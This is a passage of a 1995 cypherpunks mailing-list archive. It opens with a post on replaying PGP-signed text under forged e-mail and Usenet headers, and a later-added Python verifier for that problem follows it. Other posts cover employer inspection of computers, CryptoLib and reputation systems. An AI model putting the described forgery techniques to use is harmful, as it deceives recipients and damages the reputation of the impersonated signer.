
I'll illustrate the problem with several scenarios of forgeries.
(It's funny that earlier today I was showing a friend how easy it is to
post forgeries. She seemed suitably impressed. :)

Scenario 1:

Bob once sent Carol an e-mail that looked like this:

-----------------------------------------------------------------------
From: Bob@boxb
To: Carol@boxc
Date: 25 Dec 1965
Subject: Carol, we're history
Message-ID: <111@boxb>

----BEGIN PGP SIGNED MESSAGE----

I no longer wish to go out with you. Merry Christmas!

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

-----------------------------------------------------------------------

Carol can forge an e-mail to Alice that looks like this:

-----------------------------------------------------------------------
From: Bob@boxb
To: Alice@boxa
Date: 25 Dec 1995
Subject: Alice, we're history
Message-ID: <222@bobb>

----BEGIN PGP SIGNED MESSAGE----

I no longer wish to go out with you. Merry Christmas!

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

-----------------------------------------------------------------------

We assume that it's easy for Carol to forge the RFC 822 headers to make it look
like the e-mail came from Bob. That's why many of us use digital signatures.

The signed portion of Bob's original e-mail did not state that the message is
addressed to Carol (e.g., "Dear Carol"). Alice will probably verify that the
signature matches Bob's private key and assume that the e-mail is authentic and
has been sent to her by Bob. To repudiate the e-mail, Bob might have to point
out that the "Received:" headers differ from his usual e-mails, without relying
on PGP. In fact, the presence of his verifiable signature would create more of
a presumption of authenticity on Alice's part.

Scenario 2:

Bob sends the same e-mail as above to Carol. David, a rogue sysadmin, gets
a copy of the e-mail, forges the same e-mail as above to Alice.

Scenario 3:

Bob sends a signed e-mail to Alice. Alice sees it in her newsfeed, forges a
Usenet article, makes it look like it came from Bob, and includes the body of
Bob's e-mail as the body of the Usenet forgery. Usenet forgeries are easy.

Again, if the signed text happens to be suitable, then Bob will have difficulty
repudiating the forgery. He won't be able to use the PGP signature, which
will in fact verify. Hopefully, he'll be able to point out that the RFC 1036
Path: header is different from his usual header (which may not be the case).
Many Usenet readers would be unconvinced and Bob's reputation would be damaged.

Scenario 4:

Bob posts a signed Usenet article to alt.sex. Alice forges a usenet article in
Bob's name to misc.kids, recycling the signed body, which would probably be
considered inappropriate for misc.kids. Same result as #3.

Scenario 5:

Bob posts a signed Usenet article to some innocuous newsgroup. Alice reposts
the same body in a forgery in Bob's name. The forgery can be cross-posted to
numerous "inappropriate" newsgroups ("velveeta"), or multi-posted ("spam").
Certain rogue self-appointed net.cops forge cancels for all copies of Bob's
article, including the original. (They are a bigger menace than the forgers :)

(As several people know, I have been a victim of some of the above-described
kinds of forgeries.)

I think the underlying problem is that the way PGP signatures are used by most
people, they validate a text, but allow it to be quoted out of context in an
e-mail or Usenet forgery.

I suggest to the kind folks working on PGP 3 that there should be a standard
protocol to include within the signed portion the information on when and for
whom this text is written: i.e. the list of e-mail recipients and/or Usenet
newsgroups, which could be easily compared with the RFC 822/1036 headers of an
e-mail/Usenet article. Perhaps there could be a new option for PGP to look
_outside_ the signed block and match the headers with what's inside the block.
For example, suppose the signature block says: this text was written by
alice@zog.org, posted to alt.sex and alt.sex.banal and e-mailed to
bob@masons.com. Suppose PGP is asked to check the signature in a file that
purports to be an e-mail or a Usenet article and has some headers before the
signed portion. If there is a list of To: recipients, and it includes someone
other than the recipients listed within the signed block; or if there is a
Newsgroups: header, and it includes newsgroups not listed within the signed
portion; then the input is bogus. For compatibility with the existing software,
if the signed block doesn't include this info, then this checking shouldn't be
done, of course.

After I posted the above suggestion to cypherpunks, one very respected member
of that list informed me that "the security multiparts standard (RFC 1848)
includes a provision for signing the headers as well as the body of a message.
The security multiparts can be used with PGP, and there is even an Internet
Draft for it (draft-elkins-pem-pgp-02.txt), but there is not yet consensus for
adopting this as a standard on the pgp-mime mailing list."

I hope my examples will convince some that present practice of signing pieces
of text which can be quoted out of context in a forgery is just not enough.

We need to have an easy way to sign the headers without resorting to mine.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
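
The header check proposed in the post above (and in its earlier copy in this archive), as an added example that is not part of the original message or of PGP: the signed text declares its intended recipients and newsgroups, and a verifier rejects outer headers that go beyond them. The field names `Signed-To` and `Signed-Newsgroups` and all sample messages are constructed assumptions; verifying the signature itself is left to PGP, and this check only means something once that has passed.

```python
import re
from email import message_from_string
from email.utils import getaddresses

# Hypothetical field names: the post proposes the idea but defines no syntax.
FIELD_TO = "Signed-To"
FIELD_NEWSGROUPS = "Signed-Newsgroups"

# The post draws the armor lines with four dashes; PGP itself emits five.
BEGIN_MSG = re.compile(r"-{4,5}BEGIN PGP SIGNED MESSAGE-{4,5}")
BEGIN_SIG = re.compile(r"-{4,5}BEGIN PGP SIGNATURE-{4,5}")


def signed_lines(body):
    """Return the lines covered by the signature, or None if not clearsigned."""
    lines = [line.rstrip() for line in body.splitlines()]
    start = next((i for i, l in enumerate(lines) if BEGIN_MSG.fullmatch(l)), None)
    if start is None:
        return None
    end = next((i for i in range(start + 1, len(lines))
                if BEGIN_SIG.fullmatch(lines[i])), None)
    if end is None:
        return None
    block = lines[start + 1:end]
    # Armor headers such as "Hash:" sit before the first blank line and are
    # not covered by the signature, so a declaration there proves nothing.
    if "" not in block:
        return None
    return block[block.index("") + 1:]


def declarations(lines):
    """Collect the declaration lines that open the signed text, if any."""
    declared = {FIELD_TO: [], FIELD_NEWSGROUPS: []}
    found = False
    for line in lines:
        name, sep, value = line.partition(":")
        if not sep or name not in declared:
            break  # first line that is not a declaration ends the list
        declared[name].append(value)
        found = True
    return declared if found else None


def _addresses(values):
    return {addr.lower() for _name, addr in getaddresses(values) if addr}


def _groups(values):
    return {g.strip().lower() for v in values for g in v.split(",") if g.strip()}


def check_context(raw_message):
    """Return (verdict, problems); verdict is unsigned, unbound, ok or bogus."""
    msg = message_from_string(raw_message)
    if msg.is_multipart():
        return "unsigned", []
    covered = signed_lines(msg.get_payload())
    if covered is None:
        return "unsigned", []
    declared = declarations(covered)
    if declared is None:
        # Compatibility rule from the post: no declaration, no check.
        return "unbound", []
    extra_to = _addresses(msg.get_all("To", [])) - _addresses(declared[FIELD_TO])
    extra_ng = (_groups(msg.get_all("Newsgroups", []))
                - _groups(declared[FIELD_NEWSGROUPS]))
    problems = [f"To: {a} is not declared in the signed text"
                for a in sorted(extra_to)]
    problems += [f"Newsgroups: {g} is not declared in the signed text"
                 for g in sorted(extra_ng)]
    return ("bogus" if problems else "ok"), problems


def _sample(headers, signed_text):
    """Build a constructed clearsigned message with a placeholder signature."""
    return (headers + "\n"
            "-----BEGIN PGP SIGNED MESSAGE-----\n\n"
            + signed_text +
            "\n-----BEGIN PGP SIGNATURE-----\n\n"
            "(constructed placeholder, not a real signature)\n"
            "-----END PGP SIGNATURE-----\n")


# Constructed samples modelled on Scenarios 1 and 3 of the post.
BODY = "I no longer wish to go out with you. Merry Christmas!\n"
BOUND = "Signed-To: Carol@boxc\n\n" + BODY
ORIGINAL = _sample("From: Bob@boxb\nTo: Carol@boxc\n", BOUND)
REPLAY_TO_ALICE = _sample("From: Bob@boxb\nTo: Alice@boxa\n", BOUND)
REPLAY_TO_USENET = _sample("From: Bob@boxb\nNewsgroups: misc.kids\n", BOUND)
LEGACY = _sample("From: Bob@boxb\nTo: Alice@boxa\n", BODY)

if __name__ == "__main__":
    for label, raw in (("original", ORIGINAL), ("replay to Alice", REPLAY_TO_ALICE),
                       ("replay to Usenet", REPLAY_TO_USENET), ("legacy", LEGACY)):
        print(label, check_context(raw))
```

The legacy sample comes back as "unbound" rather than "ok": a verifier following the post's compatibility rule cannot tell an old-style signature from one replayed out of context, so that verdict should be shown to the reader as a distinct state.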





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Dec 1995 22:26:48 +0800
To: cypherpunks@toad.com
Subject: Re: Employer Probing Precedents?
Message-ID: <ad075aa403021004f767@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:51 PM 12/27/95, "Jason D. Livingood/WSC"@hks.net wrote:
>To Whom It May Concern:
>
>I was curious as to where I might find some electronic freedom legal
>precedents.  If, for example, an employer was planning to probe file
>systems on
>PCs in the off-hours and employees began encrypting their hard drives, what
>legal precedents would support the employees or would support the employer in
>blocking the encryption?

Think of it another way.

I have a PC which is for the use of my employee. It is my computer. I am
his employer. He runs the programs I authorize him to, or at least I trust
him to run programs needed to do his job and not use my computer to run a
numbers racket or to manage his drug business. Thus, I reserve the right to
inspect my own computer as I wish. He is free to accept this condition, or
of course to leave.

There can be no valid or reasonable law which says that my computer, which
he uses, is no longer accessible to me because his "electronic privacy"
takes precedence over my property rights. Nor any valid or reasonable law
which says I cannot restrict what encryption programs he uses on *my*
computer.

(There are several on this list who disparage what they call the
"libertarian emphasis on property rights over human rights," or somesuch.
Fact is, property rights are central to all human rights. In the case of my
employee using my computer, the concept of "his" human rights makes little
sense: there is no "democracy" in corporations, as we normally think of
democracy. Nor is there any "right of free speech," and so on. You may not
like this, but this is the way it is, and should be.)

I can't cite case law about "employee privacy," not being a lawyer, but I
know that companies routinely restrict the uses to which their computers
are put (video games, gambling, accessing porn are some obvious examples)
and employees have very little to say about it. Furthermore, companies may
need to look at hard drives to see if pirated software which could expose
them to millions of dollars in damages (and raids by the SPA cops).

I may not _like_ the fact that my employer (if I had one) is rooting
through my hard disk, but it is, after all, his computer, and his liability
if I am using his computers for illegal or unprofessional purposes.

The courts have granted certain types of employee privacy, about things
like the contents of purses and briefcases (though both of these examples
can and do face inspections, as I faced when I worked for Intel). And
monitoring of phone conversations now has a set of rules associated with
it.

But employers can always restrict what kinds of programs can be run on
their computers.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Albatross <alby@empire.org>
Date: Thu, 28 Dec 1995 23:25:21 +0800
To: nobody@mail.uu.net
Subject: Re: BoS: Re: Misconfigured Web Servers
In-Reply-To: <Pine.SUN.3.91.951227164940.5515F-100000@thetics.europa.com>
Message-ID: <199512280308.WAA09007@empire.org>
MIME-Version: 1.0
Content-Type: text


> 
> On Wed, 27 Dec 1995, David Klur wrote:
> 
> >      
> >      Re: the "trick" below... an even more effective search is the 
> >      following...
> >      
> Is it just me, or is everyone getting a dozen of these?


	Yup!  I'm also receiving a ton..
-Alby




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 28 Dec 1995 22:55:17 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
Message-ID: <199512280309.WAA23655@pipe10.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


[I mistakenly failed to post the original message to which A.J. Stuckey
responded to the entire group. I have corrected this error. However, A.J.
Stuckey quoted enough of the original to have his questions comprehensible
so I'll reply to them here without waiting for the original to be sent to
the list.] 
 
On Dec 27, 1995 15:50:55, '"Anthony J. Stuckey"
<stuckey@mrcnext.cso.uiuc.edu>' wrote: 
 
 
>In uiuc.mlist.cypherpunks you write: 
>>We live in a post-Faustian world.  
>>  
>>It is divided into two groups of people. First are those who understand the 
>>post-Faustian character and devote themselves to getting used to it and 
>>even having fun with the new opportunities while understanding that the new 
>>world also generates new problems (like furthering data-narcissism). Second 
>>are those classic-reactionary forces (from all parts of the political 
>>spectrum) who whine about how the post-Faustian world is personally unfair 
>>to them and how everybody in the world has a personal obligation to them to 
>>move the world back to its pre-Faustian origins.  
> 
>	Just what exactly defines a "post-Faustian" world?  That we're aware 
>people will sell their souls for power? 
>--  
 
It wasn't a matter of people selling their souls for power or that we're
aware of it. My original reference was to one view on our society (not
necessarily reflected on the list) that we must "avoid the Faustian
bargain." 
 
Gee, I hated to inform them that the Faustian bargain had already been made
and made anywhere from hundreds to tens of thousands of years ago. In this
sense, we live in a post-Faustian [bargain] world. 
 
The bargain, so to speak, was not about knowledge or power or other such
things. Those were involved only in the negotiating stages of the contract.
The *real* bargain occurred when Faust stated: 
 
     "And if I should ever say, 
     "'Oh moment stay!' 
     "Thou art so fair!' 
     "I *deserve* to perish 
     "Then and there. 
          _Faust_, Part I, Goethe 
 
We are all caught in a process that can not be even stopped let alone
turned back without damnation. We need not like this; we need not support
it; we can even pull the covers over our heads and refuse to recognize it.
But the bargain and process exists nonetheless. 
 
There are Group One people, like (most) cypherpunks and others who
understand the bargain has been made, who accept the world, and who may
even have fun participating in a continuing and ever changing process. E.G.
the microprocessor was invented. This created the possibility of things
like PGP that in turn created the first opportunity in the history of the
world for the average man and woman to have privacy as (pretty) good as any
government *if they were willing to provide themselves that privacy.* The
same invention also meant the greatest invasion of privacy through
computerized lists at credit card companies, etc. 
 
Now personally I like PGP and do not personally like credit company's data
bases. But both exist in the world and I recognize the inevitability of
both. 
 
Then you have Group Two people who whine about how the development of the
microprocessor created a world they don't like, that is unfair to them,
that is based on the Faustian bargain, etc. etc. 
 
To them, the world says (if it bothers to say anything at all) "Tough!" Nor
am I inclined to give up either PGP or my Pentium because these necessarily
exist in the same world with the credit companies they do not like. 
 
To use another example: we have the internet and we have a _de jure_
freedom of speech. 
 
Group One people like the net, even if it means that a few people are going
to send "kiddie porn" over the wires instead of looking at the old "kiddie
underwear" ads in the _Sears_ catalog. 
 
Group Two people are fearful of the net and hate it, frequently attempting
to rationalize their fears by reference to "kiddie porn," "drugs,"
"terrorists," etc.   They want their fears to dominate both the net and
freedom of speech on a global level. "If it doesn't play in Peoria then it
shouldn't play in Denmark," etc. 
 
Group One people say in essence that "kiddie porn" is a small price to pay
for the net and expanded freedom of speech; Group Two people say in essence
that the net is too high a price for "kiddie porn" and let us also reduce
freedom of speech while we're at it. 
 
As I wrote, it is a post-Faustian world and none of us can go home to the
pre-Faustian world ever again. 
 
==tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <doug@Eng.Auburn.EDU>
Date: Thu, 28 Dec 1995 22:41:41 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: another anonymous poster helping to destroy our rights
In-Reply-To: <199512272022.MAA25782@netcom17.netcom.com>
Message-ID: <Pine.SUN.3.91.951228001746.371A-100000@strangelove.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Dec 1995, Vladimir Z. Nuri wrote:

> 
> so far the "authorities" are those who have been on the list a long time.
> (it is still an informal system however).  this is a reasonable system. 
> but I object to the way that people such 
> as PM argue in one message that "there is no such thing as the cypherpunks"
> but then endlessly determine themselves what is appropriate for the list.
> doesn't anyone see the inconsistency-at-best-and-hypocrisy-at-worst of this?

No, what's appropriate is what's in the charter. Stuff related to 
cryptography and its offshoots. Conspiracy du-jour is totally unrelated,
and Perry is right, it doesn't belong. I don't see why that's so hard
to understand. Perry isn't acting as a list owner, but the subconscious
reminder to "stick closer to the charter". He's a bit bilious, but it
helps to cut out the drivel, so I don't mind so much.
 They (I) object when something is labelled as cypherpunk because many of
the people on this list have completely opposite views on different
topics. There is no gestalt.  A mailing list does not make a common
personality.


____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Thu, 28 Dec 1995 23:07:23 +0800
To: fc@all.net
Subject: Re: another anonymous poster helping to destroy our rights
Message-ID: <9512280525.AA05396@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


You know, you are really starting to annoy me with this $*i+ about how anon 
users are destroying our rights by abusing theirs.  If you don't like it, 
ignore it.  But stop cluttering bandwidth with your aimless complaints.  If you 
want cypherpunks to do something, SUGGEST something!  Stop whining and shut up!!

*sigh* it's like people cannot handle their own problems today, except by 
bleating to the public.  I am requesting that anybody who has a problem with 
anon users TALK TO THE OWNER OF THE LIST.

Munster
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Thu, 28 Dec 1995 22:43:48 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: DejaNews and Alta Vista Search Tools, and Privacy Implications
In-Reply-To: <ad065486000210045fdd@[205.199.118.202]>
Message-ID: <Pine.OSF.3.91.951228002312.20470A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


	I was interested in your comments re DejaNews because of an
experience that I had about a month ago. I received mail from Rick
Broadhead, a co-author of the Canadian Internet Guide. He wanted to know
if I was the Tim Philp who wrote a computer column for the Brantford
Expositor and if so, would I be interested in reviewing his new books. 
	It seems that he got my name from a clipping service because I 
had mentioned his first book in my column. As I did not include my E-mail 
address in my column, he used DejaNews to search for Tim & Philp. Bingo! 
my name popped out from an old Cypherpunks list posting.
	In this case it was good as I was interested in talking to him, 
but the possibilities for privacy invasion are great. In any case, I got 
an article out of the experience. I think that it will be interesting 
when some of the future politicians who are now just kids playing on the 
Internet are presented with some of their juvenile rantings when they are 
40 years old and running for office. The mind boggles!

Regards, 
Tim Philp
Brantford, Ont.,
Canada

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Thu, 28 Dec 1995 22:32:28 +0800
To: cypherpunks@toad.com
Subject: New! Improved!  CryptoLib 1.1 now available.
Message-ID: <199512280557.AAA19317@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


[Note:  This is posted on behalf of Jack Lacy, whose news posting
software is hopelessly broken; please direct responses to him at
cryptolib@research.att.com.  Jack spent the better part of the last
two weeks getting a new release of CryptoLib out the door.  This version,
which should be stable for a while, fixes a few x86 problems, improves
the interfaces to some of the functions, and now allows you to use your
own random number generator to create key material.  If you don't
already have CryptoLib, be the first nerd on your block to get the
new release.  -matt]
========

Announcing CryptoLib - Release 1.1		12/21/95
   Jack Lacy, AT&T Bell Labs

CryptoLib is a portable and efficient library of primitives
for building cryptographic applications.  It runs under most versions
of Unix as well as DOS, Windows and Windows-NT (and 95).

We are pleased to make CryptoLib source code available without charge
to researchers and developers in the US and Canada.  (Because of export
restrictions on cryptographic software, we are only able to make the
software available within the US and Canada to US and Canadian citizens
and US permanent residents.)

CryptoLib is intended for research and experimental use, and is
distributed without warranty or support.  In particular, please
note the following license conditions:

 *              Copyright (c) 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software may be subject to export controls.
 *
 * NOTE:
 * Some of the algorithms in cryptolib may be covered by patents.
 * It is the responsibility of the user to ensure that any required
 * licenses are obtained.
 *
 * SOME PARTS OF CRYPTOLIB MAY BE RESTRICTED UNDER UNITED STATES EXPORT
 * REGULATIONS.
 *
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

The attached describes the library and some timing results.

To obtain source code send electronic mail to:

	cryptolib@research.att.com

with a statement of the following form:

	"I am a U.S. or Canadian citizen or a legal permanent resident of the
	U.S. and am aware that some parts of CryptoLib may be restricted under
	United States Export regulations and may be covered under various
	US and/or foreign patents.  I have read and understand the
	CryptoLib license."

	Name:
	Location:
	E-mail:
	Are you licensed to use the RSA patent?
	   If yes, give name of licensed organization:
		
===============================================================================

CryptoLib includes the following:

	arbitrary length bignums.

	bigmath package:
		bigAdd, bigSubtract, bigMultiply, bigDivide,
		bigLeftShift, bigRightShift,
		bigAnd, bigOr, bigXor, bigCopy,
		Euclid's extended GCD,
		modular reduction and exponentiation

	crypto primitives
		DES and 3DES + modes
		Diffie-Hellman
		DSA (Signing and verification roughly equally efficient)
		El Gamal
		Rabin's scheme
		Random Number generation (PSEUDO and TRUE)
		MD[2,4,5]
		Prime generation
		RSA (provided only if you convince me that you have a license)
		SHA
		truerand (For Unix, NT and 95)
		quantization (Defense against Kocher's timing attack)
		quantized RSA, DSA and El Gamal private key operations.
		
	support functions
		asn1.c
		ioutils.c
		netIface.c

Some timing information:

All times assume 32X32 bit assembly of multiplication primitives.

bigPow times (a^b mod c with a,b,c the same length)

		512 bits	1024 bits
		--------	---------
bigPow		0.12s		0.72s		Sparc II Brickell bigpow
		0.43s		3.0s		Sparc II with asm (gcc)
		0.12s		0.78s		Sparc 10 with asm
		0.03s		0.17s		Sparc 10 with asm (Brickell)
		0.084s		0.45s		SGI Indigo (150MHz)
		0.109s		0.75s		100 MHz Pentium (gcc under DOS)

Strong Prime Generation -- ProbTestAttempts = 5
100 primes generated in each test.  Times below are:
(total test time)/100 = avg. time per prime generated.
Using Gordon's strong prime algorithm.

    256		512	1024	Machine
    ---		---	----	-------
    2.8s	24.0s	5.11m	Sparc II 
    .45s	2.7s	77s	100 MHz pentium
	


	RSA Times (64 bit public exponent, message encrypted is full length)
	---------

		512	768	1024 bits	machine
		---	---	---------	-------
encrypt		30ms	50ms	80ms		sparc II
decrypt		160ms	480ms	930ms

encrypt		15ms	33ms	56ms		100 MHz Pentium (Under NT)
decrypt		38ms	104ms	214ms


	DSA Times
	---------

		512	768	1024 bits	machine
		---	---	---------	-------
sign		99ms	166ms	216ms		sparc II (Brickell speedup)
verify		156ms	316ms	416ms

sign		21ms	38ms	49ms		100 MHz Pentium (Under NT)
verify		27ms	43ms	71ms






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 28 Dec 1995 22:23:43 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: Telcom bill report
In-Reply-To: <01HZBAWIUN7C8Y55DD@mbcl.rutgers.edu>
Message-ID: <199512280621.BAA27713@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


E. ALLEN SMITH writes:
> >> 	Here's the additional info from Reuters. As usual, Clinton is being a
> > coward. 
> 
> How do you figure ?
> 
> >    Vice President Gore says President Clinton will sign the bill. Before
> >    the agreement, the president had been threatening for months to veto
> >    the bill if Republicans in Congress did not retreat on a long list of
>                  ~~~~~~~~~~~
> >    issues. They retreated.
>              ~~~~~~~~~~~~~~
> 
> Clinton won on this. The Administration does not appear to have altered its
> position on this substantially.
> ----------
> 	I am calling Clinton a coward for giving in to the Christian Coalition
> and not vetoing this bill due to the censorship portion. He evidently decided
> that following his oath of office and upholding the First Amendment wasn't
> worth the "porn supporter" criticism Ralph Reed and his lot would direct his
> way.

Thanks ever so much for posting my non-list-relevant private mail to the list.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 28 Dec 1995 23:18:44 +0800
To: Lou Poppler <lwp@conch.aa.msen.com>
Subject: Re: Reputation capital: FIBS case study
In-Reply-To: <2sY4wMz2BcRC083yn@mail.msen.com>
Message-ID: <Pine.SUN.3.91.951228011912.27043B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Dec 1995, Lou Poppler wrote:

> The thorniest problem in our reputation economy continues to be the
> case of the player who drops out of a match when clearly losing, to avoid
> the decrement of his rating number (based on match results only, not on
> individual games).  [......stuff deleted...]  The best defense we have
> found against the match dropper is complaining in the newsgroup.

It seems to me the easiest way to solve this problem is to list for each 
player the number of games he dropped and didn't finish along with his 
rating and experience.  Why go for elaborate social solutions when a 
simple technical solution exists?

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 29 Dec 1995 05:15:43 +0800
To: cypherpunks@toad.com
Subject: VEL_cro
Message-ID: <199512281327.IAA15628@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-28-95. NYPaper reports on Communications Security
   Establishment's spying on citizens and allies, citing Jane
   Shorten's unzips (earlier bared here).

   Deputy PM Sheila Copps velcros fig leaf, "If, in fact,
   there has been illegal activity going on, we'll want to
   deal with that in as public a way as possible."

   VEL_cro







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Fri, 29 Dec 1995 02:43:02 +0800
To: Jim Thompson <jim@SmallWorks.COM>
Subject: Re: Cybercash security
In-Reply-To: <9512271711.AA13714@hosaka.smallworks.com>
Message-ID: <Pine.SUN.3.91.951228090339.23964B-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


The current plans include a way to link your CyberCash persona with
a bank account (DDA).  If you have done that and there is cash in
your CyberCash persona, you would be able to transfer it to the bank
account.  Using ACH, this operation typically happens overnight.

Donald


On Wed, 27 Dec 1995, Jim Thompson wrote:

> 
> The thing  I'd like to understand about Cybercash is... how do I get the
> cash back out of the system?
> 
> 

=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Fri, 29 Dec 1995 04:38:43 +0800
To: cypherpunks@toad.com
Subject: Proxy/Representation?
Message-ID: <199512281517.JAA13397@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


Caveat: I haven't yet looked through the archives, and it's late.  This
may sound even less intelligent than most of what's on the list as of
late (although what with the flamewars about I'm not sure if that's
possible).

Today I made a purchase at a local store using a personal check that wasn't
mine.  It very clearly wasn't mine (since the name on the check was Helen
and mine is Dave), but I am a duly appointed representative of Helen in
certain affairs.  Including this one, which was <blush> grocery shopping
</blush>.  (There are also other affairs, some with actual legal
consequences, and there is paperwork to that effect in a lawyer's safe
somewhere.)

The question is: how do the current software packages handle representatives
and proxies for a given is-a-person?  Using PGP as an example, I can't sign
a message with Helen's key.  And a message signed with my key won't hold
as much weight because "Dave" is not "Helen."  And if every message I send
on behalf of Helen has to be followed up by a message from Helen stating
"yes, Dave may act on my behalf for this instance" then much of the point
of the proxy process is lost.  (i.e. the reduction of Helen's workload etc.)

I'm sure that this has already popped up, so I'll just ask for pointers.

dave

----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Fri, 29 Dec 1995 02:43:06 +0800
To: weidai@eskimo.com (Wei Dai)
Subject: Re: Reputation capital: FIBS case study
In-Reply-To: <Pine.SUN.3.91.951228011912.27043B-100000@eskimo.com>
Message-ID: <9512281414.AA21403@all.net>
MIME-Version: 1.0
Content-Type: text


> On Wed, 27 Dec 1995, Lou Poppler wrote:
> 
> > The thorniest problem in our reputation economy continues to be the
> > case of the player who drops out of a match when clearly losing, to avoid
> > the decrement of his rating number (based on match results only, not on
> > individual games).  [......stuff deleted...]  The best defense we have
> > found against the match dropper is complaining in the newsgroup.
> 
> It seems to me the easiest way to solve this problem is to list for each 
> player the number of games he dropped and didn't finish along with his 
> rating and experience.  Why go for elaborate social solutions when a 
> simple technical solution exists?
> 
> Wei Dai

It seems to me that not finishing a game is the same as knocking over
the board.  It's a loss for the player waiting to move, and a non-game
for the other player.  This should solve the not-finishing-a-game
problem in short order.

For the problem of playing a fake unrated player, try variations on this
scheme.  Track the players each player plays and reevaluate all players'
scores in relative terms.  To get a rating, players must engage in games
with enough other players to form a valid statistical basis - at least
100 games with rated players for 10% accuracy. 

	Start with provisional ratings in the 1-10 range based on
	comparison with other players regardless of who.

	As players play other fully rated players, add a temporary
	rating based on relative performance and post both relative
	and 1-10 ratings.

	When players reach 100 games within the rated group, they get
	an official rating.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Fri, 29 Dec 1995 03:42:51 +0800
To: "Jason D. Livingood/WSC"@hks.net
Subject: Re: Employer Probing Precedents?
In-Reply-To: <199512272151.QAA05241@bb.hks.net>
Message-ID: <Pine.SUN.3.91.951228091552.4338d-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Dec 1995 Jason D. Livingood/WSC@hks.net wrote:

> To Whom It May Concern: I was
> curious as to where I might find some electronic freedom legal
> precedents.  If, for example, an employer was planning to probe file
> systems on PCs in the off-hours and employees began encrypting their
> hard drives, what legal precedents would support the employees or
> would support the employer in blocking the encryption?  Thanks for
> any info you can give me!!

You want to take a look at the ECPA (stands for Electronic
